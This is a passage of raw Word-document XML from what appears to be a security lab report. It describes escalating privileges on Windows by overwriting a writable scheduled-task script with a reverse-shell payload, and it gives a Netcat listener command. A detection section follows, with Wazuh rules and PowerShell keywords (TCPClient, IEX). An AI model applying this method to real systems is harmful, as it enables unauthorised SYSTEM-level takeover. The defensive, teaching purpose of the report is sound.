        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B8DEA5D" wp14:editId="473937A0">
            <wp:extent cx="2367023" cy="2853690"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="533132181" name="Picture 3"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32181" name="Picture 3" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId39"/>
                    <a:srcRect t="7695" r="41752"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2369479" cy="2856651"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5C5501" w14:textId="77777777" w:rsidR="00650AF2" w:rsidRPr="003E49BF" w:rsidRDefault="00650AF2" w:rsidP="00620DCD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0396AE" w14:textId="77777777" w:rsidR="00360F16" w:rsidRPr="003E49BF" w:rsidRDefault="00360F16" w:rsidP="00360F16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109FA20D" w14:textId="11418B33" w:rsidR="00360F16" w:rsidRPr="003E49BF" w:rsidRDefault="00360F16" w:rsidP="00360F16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>My screenshot proves the "Guest" group (Authenticated Users) has "Full Control" over the file, which means anyone can rewrite the script with a malicious payload to take over the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4882499A" w14:textId="77777777" w:rsidR="00CF53B2" w:rsidRPr="003E49BF" w:rsidRDefault="00CF53B2" w:rsidP="00360F16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FE04EF" w14:textId="77777777" w:rsidR="00D354AA" w:rsidRPr="003E49BF" w:rsidRDefault="00D354AA" w:rsidP="00360F16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40538C88" w14:textId="250600F8" w:rsidR="00D354AA" w:rsidRPr="003E49BF" w:rsidRDefault="00514E33" w:rsidP="00514E33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I used the command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">on the Kali Linux machine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>to set up a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>listener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is just like keeping your phone line </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">open and waiting for a specific call. We used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the specific "channel" so the Windows machine knows exactly where to find us. When the scheduled task runs our script, the victim computer "calls" our Kali IP address on this port, which gives us full control of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E3AAEA" w14:textId="77777777" w:rsidR="0034312B" w:rsidRPr="003E49BF" w:rsidRDefault="0034312B" w:rsidP="0034312B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCB8AB7" w14:textId="6399C2D0" w:rsidR="0034312B" w:rsidRPr="003E49BF" w:rsidRDefault="0034312B" w:rsidP="0034312B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CD38699" wp14:editId="0D6ECDE2">
            <wp:extent cx="3048000" cy="833377"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="674461117" name="Picture 4"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1117" name="Picture 4" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId40"/>
                    <a:srcRect b="44272"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3048000" cy="833377"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52193CA0" w14:textId="77777777" w:rsidR="00CF53B2" w:rsidRPr="003E49BF" w:rsidRDefault="00CF53B2" w:rsidP="0034312B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00468982" w14:textId="77777777" w:rsidR="0034312B" w:rsidRPr="003E49BF" w:rsidRDefault="0034312B" w:rsidP="0034312B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEE40AE" w14:textId="7BF15959" w:rsidR="0034312B" w:rsidRPr="003E49BF" w:rsidRDefault="00286895" w:rsidP="0034312B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>used the Out-File command, which overwrites the existing, safe script with our malicious "reverse shell" code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. We need this step to plant our trap in a location where the computer’s "Master" (SYSTEM) user will automatically run it for us. By storing our instructions in the $payload variable and forcing them into the file, we ensure that the next time the scheduled task triggers, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> "calls" our Kali machine instead of performing its normal cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50519CAF" w14:textId="77777777" w:rsidR="00D23E7D" w:rsidRPr="003E49BF" w:rsidRDefault="00D23E7D" w:rsidP="00D23E7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B5442C" w14:textId="0806D727" w:rsidR="00D23E7D" w:rsidRPr="003E49BF" w:rsidRDefault="000F4FBF" w:rsidP="0084134E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658241" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33D7AA6D" wp14:editId="3A6A5A96">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3755390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>23495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="914400" cy="166254"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="1786399038" name="Rectangle 7"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="914400" cy="166254"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FFFF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311EDF9">
              <v:rect id="Rectangle 7" style="position:absolute;margin-left:295.7pt;margin-top:1.85pt;width:1in;height:13.1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yellow" strokeweight="1pt" w14:anchorId="4126616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Iy+fagIAADcFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9v2jAQfp+0/8Hy+whBlG2ooUKtmCah thqd+mwcG6I5Pu9sCOyv39kJgXU8TcuDc/bdfffD3/n27lAbtlfoK7AFzwdDzpSVUFZ2U/DvL4sP nzjzQdhSGLCq4Efl+d3s/bvbxk3VCLZgSoWMQKyfNq7g2xDcNMu83Kpa+AE4ZUmpAWsRaIubrETR EHptstFwOMkawNIhSOU9nT60Sj5L+ForGZ609iowU3DKLaQV07qOaza7FdMNCretZJeG+IcsalFZ CtpDPYgg2A6rv6DqSiJ40GEgoc5A60qqVANVkw/fVLPaCqdSLdQc7/o2+f8HKx/3K/eM1IbG+akn MVZx0FjHP+XHDqlZx75Z6hCYpMPP+Xg8pJZKUuWTyehmHJuZnZ0d+vBFQc2iUHCku0gtEvulD63p ySTGsrCojEn3YWw88GCqMp6lDW7W9wbZXtBFLuij0C3GhRkFj67ZuZQkhaNREcPYb0qzqqTkRymT xDLVwwoplQ2TDjdZRzdNKfSO+TVHE/LOqbONbiqxr3ccXnP8M2LvkaKCDb1zXVnAawDljz5ya3+q vq05lr+G8viMDKHlvndyUdGFLIUPzwKJ7HSHNMDhiRZtoCk4dBJnW8Bf186jPXGQtJw1NDwF9z93 AhVn5qsldiZu0LSlzfjm44hi4KVmfamxu/oe6FpzeiqcTGK0D+YkaoT6leZ8HqOSSlhJsQsuA542 96EdanoppJrPkxlNmBNhaVdORvDY1Ui4l8OrQNexMhCdH+E0aGL6hpytbfS0MN8F0FVi7rmvXb9p OhP3u5ckjv/lPlmd37vZbwAAAP//AwBQSwMEFAAGAAgAAAAhAM4UQHLfAAAACAEAAA8AAABkcnMv ZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyo05Y2JMSpChLiVCQKHLi58TaJiNcmdtPk71lOcBzN aOZNsRltJwbsQ+tIwXyWgECqnGmpVvD+9nRzByJETUZ3jlDBhAE25eVFoXPjzvSKwz7Wgkso5FpB E6PPpQxVg1aHmfNI7B1db3Vk2dfS9PrM5baTiyRZS6tb4oVGe3xssPran6yC3UP60dhx58Nw/H75 9M/TeptOSl1fjdt7EBHH+BeGX3xGh5KZDu5EJohOwSqb33JUwTIFwX66XLE+KFhkGciykP8PlD8A AAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250 ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAv AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAySMvn2oCAAA3BQAADgAAAAAAAAAAAAAAAAAu AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAzhRAct8AAAAIAQAADwAAAAAAAAAAAAAA AADEBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANAFAAAAAA== "/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1546A016" wp14:editId="7D8ABF4F">
            <wp:extent cx="5829300" cy="993746"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="394141019" name="Picture 5" descr="A computer scree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0570" name="Picture 5" descr="A computer screen with white text  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="993746"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D184E03" w14:textId="77777777" w:rsidR="00D23E7D" w:rsidRPr="003E49BF" w:rsidRDefault="00D23E7D" w:rsidP="00D23E7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034EBDC4" w14:textId="6F18E556" w:rsidR="00D23E7D" w:rsidRPr="003E49BF" w:rsidRDefault="00B33CEF" w:rsidP="00D23E7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In the screenshot below, the Netcat session shows that the "phone call" we were waiting for has been answered. When the scheduled task ran our trapped script, it gave us a command prompt with the highest possible permissions. By typing whoami and seeing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nt authority\system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the result, we have official proof that we now have full control over the entire Windows machine. Hence proving a successful Privilege Escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED1CDD2" w14:textId="77777777" w:rsidR="00B502DE" w:rsidRDefault="00B502DE" w:rsidP="00B502DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E0D18B3" w14:textId="3454EFFA" w:rsidR="00C304E6" w:rsidRDefault="0084134E" w:rsidP="0084134E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39870FBB" wp14:editId="24059E1D">
            <wp:extent cx="4933950" cy="1464197"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1472799914" name="Picture 6" descr="A computer scree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99914" name="Picture 6" descr="A computer screen with white text  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="30756"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4933950" cy="1464197"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F00AA" w14:textId="77777777" w:rsidR="00B502DE" w:rsidRDefault="00B502DE" w:rsidP="0084134E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0054EF5D" w14:textId="77777777" w:rsidR="00887727" w:rsidRDefault="00887727" w:rsidP="0084134E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5B028D" w14:textId="77777777" w:rsidR="00887727" w:rsidRDefault="00887727" w:rsidP="0084134E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8F60C5" w14:textId="361EE0B3" w:rsidR="00ED5F9B" w:rsidRDefault="00500AD9" w:rsidP="00ED5F9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc220896689"/>
      <w:commentRangeStart w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Detection / IOCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:commentRangeEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="27"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="692FA541" w14:textId="77777777" w:rsidR="005E069F" w:rsidRPr="005E069F" w:rsidRDefault="005E069F" w:rsidP="005E069F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Prior to the execution of the attack, Wazuh was configured with specific rules and integration with Windows Sysmon and PowerShell Operational Logging to ensure full visibility into administrative abuses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E3993C" w14:textId="77777777" w:rsidR="005E069F" w:rsidRPr="005E069F" w:rsidRDefault="005E069F" w:rsidP="005E069F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Privilege Escalation Monitoring (T1053):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> I configured Wazuh to monitor for MITRE Technique T1053.005, focusing on the creation or modification of Scheduled Tasks. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This involved monitoring taskschd.msc events and registry changes to ensure any task pointing to a system-level script was audited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A7ED8" w14:textId="77777777" w:rsidR="005E069F" w:rsidRPr="005E069F" w:rsidRDefault="005E069F" w:rsidP="005E069F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Rule Configuration (T1059.001):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> I enabled rules targeting the Execution phase of the attack. By monitoring for suspicious PowerShell keywords (like TCPClient and IEX), the system could flag when a scheduled task deviated from its normal "cleanup" behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60FB76" w14:textId="77777777" w:rsidR="005E069F" w:rsidRPr="005E069F" w:rsidRDefault="005E069F" w:rsidP="005E069F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Logging Policy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell Script Block Logging (Event ID 4104) was enabled via Local Group Policy. This was crucial because it allowed the Wazuh manager to capture the plain-text content of the hijacked cleanup.ps1 script </w:t>
      </w:r>
